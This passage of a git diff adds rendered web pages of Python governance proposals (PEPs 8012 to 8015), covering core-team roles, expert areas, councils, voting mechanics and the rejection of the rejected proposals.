Diverse Uses of Python Moreover, Python is used by a +diverse group of users, from school children through scientists to +corporations with multi-million line codebases. We want to include +all our varied audiences.

+

Vitality We want to avoid stagnation. Python is a mature project but it +needs to keep evolving to stay relevant, both the runtime and the programming +language. To do that, people interested in improving a particular part +of the project should be able to do so without needless friction. +But for substantial changes, we want some discourse and reflection to ensure +the changes are wise.

+
+
+

Rationale

+

Inclusive The Community Model is the most inclusive model. No single person +or a small group of people is in a distinguished position of power over +others. Contributors and any workgroups in this model are self-selecting.

+

Pragmatic This model ensures no user group is put at a disadvantage due to +the interests of a single person or a small group of people.

+

Proven This model works. There is a number of large open-source projects +run this way (two of which, Rust and Django, are described in PEP 8002). +ECMAScript and C++ are similarly developed.

+
+
+

Specification

+
+

Key people and their functions

+
+

The core team

+

The Python project is developed by a team of core developers. +While membership is determined by presence in the “Python core” team +in the “python” organization on GitHub, contribution takes many forms:

+
    +
  • committing changes to the repository;
  • +
  • reviewing pull requests by others;
  • +
  • triaging bug reports on the issue tracker;
  • +
  • discussing topics on official Python communication channels.
  • +
+

Some contributors are may be considered dormant, in other words they did not +contribute to the last two releases of CPython. Any dormant contributor can at +any time resume contribution.

+
+
+

Experts

+

The Python Developer’s Guide lists a number of interest areas along with +names of core developers who are recognized as experts in the given +area. An expert or a sub-team of experts has the following +responsibilities:

+
    +
  • responding to issues on the bug tracker triaged to the given interest +area on a timely basis;
  • +
  • reviewing pull requests identified as belonging to the given interest +area on a timely basis;
  • +
  • overviewing cohesive design in the evolution of the given interest +area.
  • +
+

A core developer can assign and unassign themselves at will to +a given interest area. Existing experts listed for the given interest +area must be made aware of this change and have to unanimously agree to +it.

+

If a given interest area lists multiple experts, they form a sub-team +within the core team. They are responsible for the given interest area +together.

+

A core developer should avoid membership as an expert in too many +interest areas at the same time. This document deliberately doesn’t +specify a maximum number, it simply signals that overexertion leads to +burnout and is a risk to the project’s ability to function without +a given contributor.

+
+
+

Moderators

+

There is a group of people, some of which are not core developers, +responsible for ensuring that discussions on official communication +channels adhere to the Code of Conduct. They take action in view of +violations.

+
+
+
+

Regular decision process

+

Primary work happens through bug tracker issues and pull requests. +Core developers should avoid pushing their changes directly to the cpython +repository, instead relying on pull requests. Approving a pull +request by a core developer allows it to be merged without further +process.

+

Notifying relevant experts about a bug tracker issue or a pull request +is important. Reviews from experts in the given interest area are +strongly preferred, especially on pull request approvals. Failure to +do so might end up with the change being reverted by the relevant +expert.

+

Experts are not required to listen to the firehose of GitHub and bug +tracker activity at all times. Notifying an expert explicitly during +triage or bug/pull request creation may be necessary to get their +attention.

+
+
+

Controversial decision process

+

Substantial changes in a given interest area require a PEP. This +includes:

+
    +
  • Any semantic or syntactic change to the language.
  • +
  • Backwards-incompatible changes to the standard library or the C API.
  • +
  • Additions to the standard library, including substantial new +functionality within an existing library.
  • +
  • Removing language, standard library, or C API features.
  • +
+

Failure to get a substantial change through the PEP process might result +with the change being reverted.

+

Changes that are bug fixes can be exempt from the PEP requirement. Use +your best judgement.

+
+

PEP, Enhanced

+

The PEP process is augmented with the following changes and clarifications +over information already present in PEP 1:

+
    +
  • PEPs are not merged until the final decision is made on them; they are +open pull requests on GitHub until that moment;
      +
    • to make review easier, all changes to the PEP under review should be +made as separate commits, allowing for granular comparison;
    • +
    +
  • +
  • a submitted PEP needs to identify the area of interest and relevant +experts as the body that makes the final decision on it;
  • +
  • if the PEP author is one of the experts of the relevant area of +interest, they must name another person from outside of that interest +area to contribute to the final decision in their place;
  • +
  • the PEP author is responsible for gathering and integrating feedback +on the PEP using the official communication channels, with the goal of +building consensus;
  • +
  • all community members must be enabled to give feedback;
  • +
  • at some point, one of the named experts posts a “summary comment” that +lays out the current state of discussion, especially major points of +disagreement and tradeoffs; at the same time the expert proposes +a “motion for final comment period” (FCP), along with a proposed +disposition to either:
      +
    • accept;
    • +
    • accept provisionally;
    • +
    • reject; or
    • +
    • defer the PEP.
    • +
    +
  • +
  • to enter the FCP, the PEP must be signed off by all experts of the +relevant area of interest;
  • +
  • the FCP lasts for fourteen calendar days to allow stakeholders to file +any final objections before a decision is reached.
  • +
+
+
+

Very controversial PEPs

+

If a core contributor feels strongly against a particular PEP, during +its FCP they may raise a motion to reject it by vote. Voting details +are described below in “Voting Mechanics”.

+

This should be a last resort and thus a rare occurrence. It splits the +core team and is a stressful event for all involved. However, the +experts filing for a FCP for a PEP should have a good sense whether +a motion to reject it by vote is likely. In such a case, care should be +taken to avoid prematurely filing for a FCP.

+

There is no recourse for the opposite situation, i.e. when the +experts want to reject a PEP but others would like it accepted. This +ensures that the relevant experts have the last say on what goes in. +If you really want that change, find a way to convince them.

+

Moderators on official communication channels enforce the Code of +Conduct first and foremost, to ensure healthy interaction between all +interested parties. Enforcement can result in a given participant +being excluded from further discussion and thus the decision process.

+
+
+

Revisiting deferred and rejected PEPs

+

If a PEP is deferred or rejected, the relevant experts should be +contacted first before another attempt at the same idea is made. +If the experts agree there is substantial evidence to justify +revisiting the idea, a pull request editing the deferred or rejected +PEP can be opened.

+

Failure to get proper expert buy-in beforehand will likely result in +immediate rejection of a pull request on a deferred or rejected PEP.

+
+
+
+

Other Voting Situations

+
+

Nominating a new core developer

+

A champion nominates a person to become a new core developer by posting +on official communication channels. A vote is opened.

+

If any existing core developer does not feel comfortable with the nominee +receiving the commit bit, they should preferably address this concern in +the nomination thread. If there is no satisfactory resolution, they can +cast a negative vote.

+

In practice, nominating a person for a core developer should often meet +with surprise by others that this person is not a core developer yet. +In other words, it should be done when the candidate is already known +and trusted well enough by others. We should avoid nominations based on +potential.

+
+
+

Votes of no confidence

+
    +
  • Removing a core developer from the core team;
  • +
  • Disbanding the experts team for a given area of interest.
  • +
+

Those describe a situation where a core developer is forcefully +removed from the core team or an experts team is forcefully disbanded. +Hopefully those will never have to be exercised but they are explicitly +mentioned to demonstrate how a dysfunctional area of interest can be +healed.

+

If a core developer is removed by vote from the core team, they lose +the ability to interact with the project. It’s up to the Moderators’ +discretion to remove their ability to post on the bug tracker and GitHub +or just moderate their future behavior on a case-by-case basis.

+

If the experts team for an area of interest is disbanded, other core +developers can step up to fill the void at will. Members of the +disbanded experts team cannot self-nominate to return.

+
+
+
+

Voting Mechanics

+

All votes described in this document are +1/-1/0 (“Yea”/”Nay”/”Present”) +recorded votes. There are no other vote values, in particular values +out of range or fractions (like +0.5) are invalid.

+

Votes take fourteen calendar days. The starting date is taken looking at +the timezone of the person who filed for the motion to vote. The end +date is fourteen days later Anywhere-On-Earth.

+

Dormant core developers as defined in “Key people and their functions” +above are not counted towards the totals if they abstain. However, they +can vote if they choose to do so and that way they count as active. +Voting is a form of contribution.

+

Voting is done by a commit to a private repository in the “python” +organization on GitHub. The repository is archived and publicized after +the voting period is over. The repository’s name should start with +“vote-“.

+

Changes to one’s vote during the voting period is allowed. Peeking +at other developers’ cast votes during the time of the vote is possible.

+

Every situation requires a different vote percentage:

+
    +
  • PEP rejection by vote requires over 1/3rd of the non-dormant core +developer population to explicitly vote to reject. Note that if +more than 1/3rd of core developers decide against a PEP, this means +there exists no super-majority of core developers who are in favor +of the change. This strongly suggests the change should not be made +in the shape described by the PEP.
  • +
  • New core developer nomination requires there to be no votes cast +against it.
  • +
  • Votes of no confidence require a super-majority of at least 2/3rds of +the non-dormant core developer population to explicitly vote in favor +of the motion.
  • +
+
+
+
+

Omissions

+

This document deliberately omits listing possible areas of interest +within the project. It also does not address election and management +of Moderators which are done by the Python Software Foundation and its +Code of Conduct Working Group which can be contacted by mailing +conduct-wg@python.org.

+
+
+

Acknowledgements

+

Thank you to the authors of PEP 8002 which was a helpful resource in +shaping this document.

+

Thank you to Alex Crichton and the Rust team for a governance model +that was a major inspiration for this document.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8012.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8013/index.html b/pep-8013/index.html new file mode 100644 index 00000000000..81cad20f79b --- /dev/null +++ b/pep-8013/index.html @@ -0,0 +1,464 @@ + + + + + + + + PEP 8013 – The External Council Governance Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8013 – The External Council Governance Model

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
14-Sep-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new model of Python governance based on a Council +of Auditors (CoA) tasked with making final decisions for the language. +It differs from PEP 8010 by specifically not proposing a central +singular leader, and from PEP 8011 by disallowing core committers from +being council members. It describes the size and role of the council, +how the initial group of council members will be chosen, any term +limits of the council members, and how successors will be elected.

+

It also spends significant time discussing the intended behaviour of +this model. By design, many processes are not specified here but are +left to the people involved. In order to select people who will make +the best decisions, it is important for those involved to understand +the expectations of the CoA but it is equally important to allow the +CoA the freedom to adjust process requirements for varying +circumstances. This only works when process is unspecified, but all +participants have similar expectations.

+

This PEP does not name the members of the CoA. Should this model be +adopted, it will be codified in PEP 13 along with the names of all +officeholders described in this PEP.

+
+
+

PEP Rejection

+

PEP 8013 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

The Importance of the Grey Area

+

In any actual decision-making process, there is going to be grey area. +This includes unexpected scenarios, and cases where there is no +“correct” answer.

+

Many process plans attempt to minimise grey area by defining processes +clearly enough that no flexibility is required.

+

This proposal deliberately goes the other way. The aim is to provide a +robust framework for choosing the best people to handle unexpected +situations, without defining how those people should handle those +situations.

+

Examples are provided of “good” responses to some situations as an +illustration. The hope is that the “best” people are the best because +they would live up to those examples. The process that is proposed has +been designed to minimise the damage that may be caused when those +people turn out not to be the best.

+

Grey area is guaranteed to exist. This proposal deliberately embraces +and works within that, rather than attempting to prevent it.

+
+
+

Model Overview

+
+

Key people and their functions

+

The Council of Auditors (CoA) is a council of varying size, typically +two to four people, who are elected for the duration of a Python +release. One member of the CoA is considered the President, who has +some minor points of authority over the other members.

+

The CoA has responsibility for reviewing controversial decisions in +the form of PEPs written by members of the core development team. The +CoA may choose to accept a PEP exactly as presented, or may request +clarification or changes. These changes may be of any form and for any +reason. This flexibility is intentional, and allows the process to +change over time as different members are elected to the CoA. See the +later sections of this document for examples of the kinds of requests +that are expected.

+

The CoA only pronounces on PEPs submitted to python-committers. There +is no expectation that the CoA follows or participates on any other +mailing lists. (Note that this implies that only core developers may +submit PEPs. Non-core developers may write and discuss proposals on +other mailing lists, but without a core developer willing to support +the proposal by requesting pronouncement, it cannot proceed to +acceptance. This is essentially the same as the current system, but is +made explicit here to ensure that members of the CoA are not expected +to deal with proposals that are not supported by at least one core +developer.)

+

The CoA may not delegate authority to individuals who have not been +elected by the core developer team. (One relevant case here is that +this changes the implementation of the existing BDFL-Delegate system, +though without necessarily changing the spirit of that system. See the +later sections, particularly example scenario four, for more +discussion on this point.)

+

The Release Manager (RM) is also permitted the same ability to request +changes on any PEPs that specify the release they are responsible for. +After feature freeze, the RM retains this responsibility for their +release, while the CoA rotates and begins to focus on the subsequent +release. This is no different from the current process. The process +for selection of a RM is not changed in this proposal.

+

Core developers are responsible for electing members of the CoA, and +have the ability to call a “vote of no confidence” against a member of +the CoA. The details of these votes are discussed in a later section.

+

Where discussions between core developers and members of the CoA +appear to be ongoing but unfruitful, the President may step in to +overrule either party. Where the discussion involves the President, it +should be handled using a vote of no confidence.

+

Members of the CoA may choose to resign at any point. If at least two +members of the CoA remain, they may request a new election to refill +the group. If only one member remains, the election is triggered +automatically. (The scenario when the President resigns is described +in a later section.)

+

The intended balance of power is that the core developers will elect +members of the CoA who reflect the direction and have the trust of the +development team, and also have the ability to remove members who do +not honour commitments made prior to election.

+
+
+

Regular decision process

+

Regular decisions continue to be made as at present.

+

For the sake of clarity, controversial decisions require a PEP, and +any decisions requiring a PEP are considered as controversial.

+

The CoA may be asked to advise on whether a decision would be better +made using the controversial decision process, or individual members +of the CoA may volunteer such a suggestion, but the core development +team is not bound by this advice.

+
+
+

Controversial decision process

+

Controversial decisions are always written up as PEPs, following the +existing process. The approver (formerly “BDFL-Delegate”) is always +the CoA, and can no longer be delegated. Note that this does not +prevent the CoA from deciding to nominate a core developer to assess +the proposal and provide the CoA with a recommendation, which is +essentially the same as the current delegation process.

+

The CoA will pronounce on PEPs submitted to python-committers with a +request for pronouncement. Any member of the CoA, or the current RM, +may request changes to a PEP for any reason, provided they include +some indication of what additional work is required to meet their +expectations. See later sections for examples of expected reasons.

+

When all members of the CoA and the RM indicate that they have no +concerns with a PEP, it is formally accepted. When one or more members +of the CoA fail to respond in a reasonable time, the President of the +CoA may choose to interpret that as implied approval. Failure of the +President to respond should be handled using a vote of no confidence.

+
+
+

Election terms

+

Members of the CoA are elected for the duration of a release. The +members are elected prior to feature freeze for the previous release, +and hold their position until feature freeze for their release.

+

Members may seek re-election as many times as they like. There are no +term limits. It is up to the core developers to prevent re-election of +the CoA members where there is consensus that the individual should +not serve again.

+
+
+

Election voting process

+

The election process for each member of the CoA proceeds as follows:

+
    +
  • a nomination email is sent to python-committers
  • +
  • a seconding email is sent
  • +
  • the nominee is temporarily added to python-committers for the +purpose of introducing themselves and presenting their position
  • +
  • voting opens two weeks prior to the scheduled feature freeze of the +previous release
  • +
  • votes are contributed by modifying a document in a private github +repository
  • +
  • each core developer may add +1 votes for as many candidates as they +like
  • +
  • after seven days, voting closes
  • +
  • the nominee with the most votes is elected as President of the CoA
  • +
  • the next three nominees with the most votes and also at least 50% +the number of votes received by the President are elected as the +other members of the CoA
  • +
  • where ties need to be resolved, the RM may apply one extra vote for +their preferred candidates
  • +
  • accepted nominees remain on python-committers; others are removed
  • +
+
+
+

No-confidence voting process

+

A vote of no confidence proceeds as follows:

+
    +
  • a vote of no confidence email is sent to python-committers, naming +the affected member of the CoA, justifying the nomination, and +optionally listing accepted PEPs that the nominator believes should +be reverted
  • +
  • a seconding email is sent within seven days
  • +
  • the nominated member of the CoA is allowed seven days to respond, +after which the nominator or the seconder may withdraw
  • +
  • if no nominator or seconder is available, no further action is +taken
  • +
  • voting opens immediately
  • +
  • each core developer may add a +1 vote (remove the CoA member) or +a -1 vote (keep the CoA member) by modifying a document in a +private github repository
  • +
  • after seven days, voting closes
  • +
  • if +1 votes exceed -1 votes, the CoA member is removed from +python-committers and any nominated PEPs are reverted
  • +
  • if requested by the remaining members of the CoA, or if only one +member of the CoA remains, a new election to replace the removed +member may be held following the usual process.
  • +
  • in the case of removing the President of the CoA, the candidate +who originally received the second-most votes becomes President
  • +
+
+
+
+

Examples of intended behaviour

+

This section describes some examples of the kind of interactions that +we hope to see between the CoA and the core developers. None of these +are binding descriptions, but are intended to achieve some consensus +on the types of processes we expect. The CoA candidates may campaign +on the basis of whatever process they prefer, and core developers +should allocate votes on this basis.

+
+

Scenario 1 - The Case of the Vague PEP

+

Often in the past, initial proposals have lacked sufficient detail to +be implementable by anyone other than the proposer. To avoid this, +the CoA should read proposals “fresh” when submitted, and without +inferring or using any implied context. Then, when an aspect of a PEP +is not clear, the CoA can reject the proposal and request +clarifications.

+

Since the proposal is rejected, it must be modified and resubmitted in +order to be reviewed again. The CoA will determine how much guidance +to provide when rejecting the PEP, as that will affect how many times +it will likely be resubmitted (and hence affect the CoA’s own +workload). This ensures that the final PEP text stands alone with all +required information.

+
+
+

Scenario 2 - The Case of the Endless Discussion

+

From time to time, a discussion between Python contributors may seem +to be no longer providing value. For example, when a large number of +emails are repeating points that have already been dealt with, or are +actively hostile towards others, there is no point continuing the +“discussion”.

+

When such a discussion is occurring on python-committers as part of a +request for pronouncement, a member of the CoA should simply declare +the thread over by rejecting the proposal. In most known cases, +discussion of this sort indicates that not all concerns have been +sufficiently addressed in the proposal and the author may need to +enhance some sections.

+

Alternatively, and in the absence of any rejection from the other +members of the CoA, the President may declare the thread over by +accepting the proposal. Ideally this would occur after directly +confirming with the rest of the CoA and the RM that there are no +concerns among them.

+

When such a discussion is occurring on another list, members of the +CoA should be viewed as respected voices similar to other core +developers (particularly those core developers who are the named +experts for the subject area). While none have specific authority to +end a thread, preemptively stating an intent to block a proposal is a +useful way to defuse potentially useless discussions. Members of the +CoA who voluntarily follow discussions other than on python-committers +are allowed to suggest the proposer withdraw, but can only actually +approve or reject a proposal that is formally submitted for +pronouncement.

+
+
+

Scenario 3 - The Case of the Unconsidered Users

+

Some proposals in the past may be written up and submitted for +pronouncement without considering the impact on particular groups of +users. For example, a proposal that affects the dependencies required +to use Python on various machines may have an adverse impact on some +users, even if many are unaffected due to the dependencies being +typically available by default.

+

Where a proposal does not appear to consider all users, the CoA might +choose to use their judgement and past experience to determine that +more users are affected by the change than described in the PEP, and +request that the PEP also address these users. They should identify +the group of users clearly enough that the proposer is able to also +identify these users, and either clarify how they were addressed, or +made amendments to the PEP to explicitly address them. (Note that this +does not involve evaluating the usefulness of the feature to various +user groups, but simply whether the PEP indicates that the usefulness +of the feature has been evaluated.)

+

Where a proposal appears to have used flawed logic or incorrect data +to come to a certain conclusion, the CoA might choose to use other +sources of information (such as the prior discussion or a submission +from other core developers) to request reconsideration of certain +points. The proposer does not necessarily need to use the exact +information obtained by the CoA to update their proposal, provided +that whatever amendments they make are satisfactory to the CoA. For +example, a PEP may indicate that 30% of users would be affected, while +the CoA may argue that 70% of users are affected. A successful +amendment may include a different but more reliable percentage, or may +be rewritten to no longer depend on the number of affected users.

+
+
+

Scenario 4 - The Case of the Delegated Decision

+

Some proposals may require review and approval from a specialist in +the area. Historically, these would have been handled by appointing a +BDFL-Delegate to make the final decision on the proposal. However, in +this model, the CoA may not delegate the final decision making +process. When the CoA believes that a subject matter expert should +decide on a particular proposal, the CoA may nominate one or more +individuals (or accept their self-nomination) to a similar position to +a BDFL Delegate. The terms of these expert’s role may be set as the +CoA sees fit, though the CoA always retains the final approval.

+

As a concrete example, assume a proposal is being discussed about a +new language feature. Proponents claim that it will make the language +easier for new developers to learn. Even before an official proposal +is made, the CoA may indicate that they will not accept the proposal +unless person X approves, since person X has a long history teaching +Python and their judgement is trusted. (Note that person X need not be +a core developer.)

+

Having been given this role, person X is able to drive the discussion +and quickly focus it on viable alternatives. Eventually, person X +chooses the alternative they are most satisfied with and indicates to +the CoA that they approve. The proposal is submitted as usual, and the +CoA reviews and accepts it, factoring in person X’s opinion.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8013.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8014/index.html b/pep-8014/index.html new file mode 100644 index 00000000000..b087c9da603 --- /dev/null +++ b/pep-8014/index.html @@ -0,0 +1,411 @@ + + + + + + + + PEP 8014 – The Commons Governance Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8014 – The Commons Governance Model

+
+
Author:
+
Jack Jansen
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
16-Sep-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a governance model with as few procedures, defined terms and +percentages as possible. It may also be called The Anarchist Governance Model +but uses Commons for now because of possible negative connotations of the +term Anarchist to some audiences.

+

The basic idea is that all decisions are in principle voted on by the whole +community, but in practice voted on by only a subset of the +community. A subset, because although the whole community is +entitled to vote in practice it will always be only a small subset that vote +on a specific decision. The vote is overseen by an impartial council that +judges whether the decision has passed or not. The intention is that this +council bases its decision not only on the ratio of yes and no votes but +also on the total number of votes, on the gravity of the proposal being +voted on and possibly the individual voters and how they voted. Thereby this +council becomes responsible for ensuring that each individual decision is +carried by a sufficient majority.

+
+
+

PEP Rejection

+

PEP 8014 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Introduction

+

The Commons Governance Model tries to ensure that all decisions are endorsed +by, or at least is acceptable to, a sufficient majority of the Python +community.

+

Unfortunately the previous paragraph has two terms that are very hard to +quantify in the general case: sufficient majority and Python community. +This is because both terms in reality depend on the specific case that is +being decided. To give an example of this difficulty: for a PEP that +proposes a backward-compatible change to some API a simple majority of the +core developers that were interested in voting on the PEP in the first place +is probably sufficient. But for a change that has more farreaching +consequences such as a Python3 to Python4 transition a real majority may be +wanted, and a demonstration that at least there seems to be sufficient +support in the user base. And for a change that transcends the +Python-the-language, such as decisions on abolishing non-inclusive language, +it becomes very vague.

+

The Commons Governance Model attempts to sidestep this issue by not +defining what the terms sufficient majority and Python community mean in +the general case, by proposing a body that will decide so in specific +cases.

+

The model proposes creating a Council of Elders that oversees the decision +process, determining whether a specific proposal has enough support on a +case-by-case basis. There will be a vote on every individual PEP, +and the Council of Elders will declare whether the +outcome of the vote is sufficient to carry the decision in this specific case.

+

The model addresses only the roles traditionally held by the BDFL in the +decision process, not other roles.

+

The term Commons in the model name is loosely based on its historic use as +a shared resource to be used by all and cared for by all. The picture you +should have in mind with this model is a sizeable group of peasants +discussing some plan for the future on the village green on a warm summer +evening, after which the vote is taken and the village elders pronounce +the outcome. Then the banquet begins.

+

The Commons Governance Model is different from most of the other governance +proposals (with the possible exception of 8012), because it explicitly places +supreme power with the whole community.

+
+
+

Rationale

+

The rationale for the model is that a model that casts everything in concrete will +have unintended negative side effects. For example, a governance model that +assigns voting rights to Python committers may cause an individual not +to be accepted as a committer because there are already a lot of committers +from the company the new candidate works for.

+

As another example, setting a fixed percentage for PEP acceptance may lead +to party-formation amongst the voters and individual PEPs no longer be being +judged on individual merit but along party lines (if you support my PEP I +will support yours).

+

There is also the issue that one-person-one-vote is not the best model for +something like Python. Again an example: in case of a split vote (or a vote +sufficiently close to being split) the opinion of core developer Guido +van Rossum should probably outweigh the opinion of core developer Jack +Jansen. Trying to formalize this in a voting model is going to lead to a +very complex model, that is going to be wrong on boundary cases anyway. The +model presented here leaves deciding on such issues to the (hopefully +sensible) council of elders.

+
+
+

Decision Process

+

All important decisions go through a PEP process. Each PEP has someone +responsible for it, called the author here, but that does not have to be a +single person, and it does not have to be the person that actually wrote the +text. So for author you could also read champion or shepherd or +something like that.

+

The PEP author is responsible for organizing a vote on the PEP. This vote is +public, i.e. the voters are identified and the results are known to all. +Voting may be simple +1/0/-1, but might also be extended with +2/-2 with a +very terse explanation why the voter feels very strong about the issue. Such +an annotation would serve as an explanation to the Council of Elders. Voters +are annotated with their community status (core developer, etc).

+

The vote is clearly separated from the discussion, by using a well-defined Discourse +category or tag, a special mailing list or a similar technical method +(such as a website vote.python.org where people have to log in so their +community status can be automatically added, and their identity can be somewhat +confirmed).

+

The PEP author presents the PEP and the vote results to the Council of Elders. +The council ponders two things:

+
    +
  • the PEP gravity and its implications,
  • +
  • the measurable vote results (how many people voted, which individuals voted, what they voted).
  • +
+

They pronounce a tentative decision on whether the vote passed and this decision is published.

+

If the decision is that the vote results do not demonstrate enough support +from the community for the decision the burden is on the author to try and +gather more support and resubmit the vote at a later date. Alternatively the +author can retract the proposal. The period for gathering more support is +time-limited, a month seems a reasonable time, if no vote has been resubmitted +after that period the proposal is rejected.

+

If the tentative decision is that the results do demonstrate enough support +a fairly short waiting period starts (in the order of weeks). During this +period anyone can appeal to the Council of Elders, but only on the grounds +that the vote does not reflect a sufficient majority of the community. +After the waiting period the council pronounces a final decision. The PEP +is either accepted or, if the council is swayed by an appeal, goes back to +the state where more support has to be demonstrated.

+
+
+

Council of Elders

+

The intention of the Council of Elders is that they, together, are capable +of judging whether the will of the Python community is upheld in a specific +vote.

+

The Council of Elders is not a replacement of the BDFL by a group of +people with the same power as the BDFL: it will not provide guidance on the +direction of Python, it only attempts to ensure the outcome of a vote +represents the will of the community.

+

The Council of Elders is not like the US Supreme Court, which has actual +decision power, the council only oversees the voting process to ensure that +the community is represented in the vote. And the Council of Elders is most +definitely not like the Spanish Inquisition, because fear, surprise and +ruthless efficiency are things we can do without (but there is some merit in +using the cute scarlet regalia).

+

The council is somewhat like the Dutch +Hoge Raad (which is unfortunately often translated as Supreme Court in +English) in that they judge the process and the procedures followed and can +only send cases back for a renewed judgement.

+

It is also somewhat like the election commission that many countries have +(under different names) in that it oversees elections.

+
+

Council operation

+

The council members are volunteers, and most likely have other roles within +the Python community as well (not to mention a life outside Python). This +means that the workload on the members should be kept to a minimum. It also +means that it should be clear when an individual council members speak as +council member and when they speak as themselves. And we should care about +the emotional load: council members should not be held accountable for +decisions by random flamers on the Python mailing list.

+

The proposal attempts to minimize the workload through two methods:

+
    +
  • Most of the actual work is to be done by the PEP author and the community, +the Council of Elders does not organize the vote and tally the results.
  • +
  • The idea behind the first tentative decision is mistakes by the Council +of elders (misjudging how far-reaching a PEP is, most likely) are not fatal, because +the community has a chance to point out these mistakes.

    Practically speaking this means that the tentative decision can be taken by +a subset of the council, depending on the community to correct them. +Getting seven hard-working professionals together every two weeks, even by +email, may be a bit much to ask.

    +
  • +
+

Clarifying when an individual Elder speaks on behalf of the Council is +probably best done by using a special email address, or some Discourse topic +into which only Elders can post. There is an analogy here with the Pope +speaking Ex Cathedra or just as himself (in which case he is not +infallible). The elders are most likely respected members of the community +and it would be a bad idea if they feel they cannot voice their personal opinion on +a PEP because they are on the council.

+

Discussion of community members with the Council of Elders, i.e. when appealing a +decision, should be done in a different forum (Discourse topic, mailing list).

+

The decisions of the Council of Elders should be seen as decisions of the +council as a whole, not as decisions of the individual members. In a first implementation +Elders should post under their own name (with the fact that they speak as a +council member conferred by the topic they post to, or possibly a special badge). +If it turns out that Elders become individual targets for ad-hominem attacks +we should revisit this and come up with some method of anonymity.

+
+
+

Limitation of freedom

+

If a specific vote has a true majority (for or against) of core team members +(more than 50% + 1 of all core team members) that outcome passes. If a specific +vote has a true majority (for or against) of PSF voting members +(more than 50% + 1) that outcome passes. And, for completeness, if both of the +previous statements are true but with opposite outcomes the core team members +win.

+

The main reason for having this limitation is that it allows decisions to be +made (albeit with effort) if there is no functioning Council of Elders at +any particular moment.

+
+
+

Council composition

+

The council should not be too big nor too small, probably somewhere between +5 and 10 members. There is no reason to fix this number. +The members should be knowledgeable about Python and the +Python community, and willing to be impartial while operating as part of +the council. Council members may be core developers but this is not a requirement.

+

Everyone in the community should feel represented by the council so it would +be good if the council is diverse:

+
    +
  • scientists and technologists,
  • +
  • progressives and conservatives (with respect to the Python language),
  • +
  • people with different cultural backgrounds, genders, age,
  • +
  • etc
  • +
+

But: this should hold for the council as a whole. Individual council members +should not be seen as representing a specific interest group.

+
+
+

Council membership

+

Because the powers of the council are purely procedural it is probably good +if members serve for a fairly long time. However, it would still be good if +the council was reinstated regularly. Therefore, the suggestion is to have the council +operate under the PSF umbrella and be subject of a yearly vote of confidence. This +vote is for the council as a whole: people who vote against the council should be +aware that they are basically saying “Python is better off without a Council of Elders +than with you lot”.

+

The council normally co-opts new Elders, probably because an individual is seen +to have knowledge about a specific part of the Python community (or language) in which +the council is lacking. Everyone is free to suggest new Elders to the council +(including themselves) but the council is free to ignore the suggestion. +Council members should be free to retire at any time. An individual council +member can be retired by a unanimous vote by the rest of the council.

+

There is an emergency brake procedure to get rid of a non-functioning council. +A single Elder or a group of 10 core developers or PSF voting members can ask for +an immediate reinstating vote of the council as a whole (presumably with the +intention that the council lose their mandate). If this vote has been requested by an +Elder that individual immediately lose their council position, independent of +the outcome of the vote. If the vote has been requested by community members and +the council is reinstated this procedure cannot be invoked again for a year.

+

If there is no functioning council (the current initial situation, or after the +council have lost their mandate after a vote of no confidence) an initial +council must be selected. Through the normal communication channels (discourse, +mailing lists) members can be suggested by anyone (including themselves). After +discussion amongst the nominees and in the whole community a group of at least +three individuals should emerge that ask for an initial vote to instate them +as Council of Elders. The intention of this procedure is that by the time such +a group of individuals emerges and asks for a vote of confidence they expect an +overwhelming mandate.

+
+
+
+

Discussion

+

This PEP does not handle other roles of the BDFL, only the voting process. +Most importantly, the direction of Python in the long term is not expected +to be handled by the Council of Elders. This falls to the community as a whole +(or to individual members of the community, most likely).

+

There is also the role of figurehead or spokesperson to represent Python and +the Python community to the outside world. Again, this is not a role that +should be handled by the Council of Elders, in my opinion, but by some +other person or body.

+

Note that this proposal most likely favors conservatism over progression. Or, at least, the +danger of it leading to stagnation is bigger than the danger of it leading +to reckless blazing ahead into unknown territories. So: we should realise +that it is unlikely that a PEP like PEP 572 will pass if this model is in +place.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8014.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8015/index.html b/pep-8015/index.html new file mode 100644 index 00000000000..568260d92a0 --- /dev/null +++ b/pep-8015/index.html @@ -0,0 +1,768 @@ + + + + + + + + PEP 8015 – Organization of the Python community | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8015 – Organization of the Python community

+
+
Author:
+
Victor Stinner
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
04-Oct-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP formalizes the current organization of the Python community and +proposes 3 main changes:

+
    +
  • Formalize the existing concept of “Python teams”;
  • +
  • Give more autonomy to Python teams;
  • +
